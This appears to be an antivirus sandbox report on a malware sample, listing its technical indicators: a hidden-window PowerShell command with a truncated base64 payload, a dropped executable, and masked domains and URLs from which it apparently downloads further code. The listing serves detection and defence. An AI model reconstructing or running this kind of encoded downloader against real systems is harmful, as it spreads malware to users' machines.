Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABoAFIAcQA1AFgAdgA9ACcAaABvAG4AMQA3ADcAVwBYACcAOwAkAFQASgBNAG0AcwBjAFAAagAgAD0AIAAnADkAMwAzACcAOwAkAFAAaAB6AHIANQBhAGwAVgA9ACcAbwBvAGoAMgBOAFEASABoACcAOwAkAE0ATABaADIAbABqAD0AJABlAG4Ad...
- %HOMEPATH%\933.exe
- %HOMEPATH%\933.exe
- 'sa###yesh.com':80
- 'sa###yesh.com':443
- 'br####rainersuk.com':80
- 'sc####tonline.biz':80
- 'sc####lbacher.net':80
- http://sa###yesh.com/wp-content/q7pxn30473/
- http://br####rainersuk.com/wp-admin/o3jh1036/
- http://sc####tonline.biz/cgi-bin/v4d4gn9991/
- http://sc####lbacher.net/_vti_cnf/dp1peq43/
- 'sa###yesh.com':443
- DNS ASK sa###yesh.com
- DNS ASK br####rainersuk.com
- DNS ASK sc####tonline.biz
- DNS ASK sc####lbacher.net
- DNS ASK sh###n-work.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABoAFIAcQA1AFgAdgA9ACcAaABvAG4AMQA3ADcAVwBYACcAOwAkAFQASgBNAG0AcwBjAFAAagAgAD0AIAAnADkAMwAzACcAOwAkAFAAaAB6AHIANQBhAGwAVgA9ACcAbwBvAGoAMgBOAFEASABoACcAOwAkAE0ATABaADIAbABqAD0AJABlAG4Ad...' (со скрытым окном)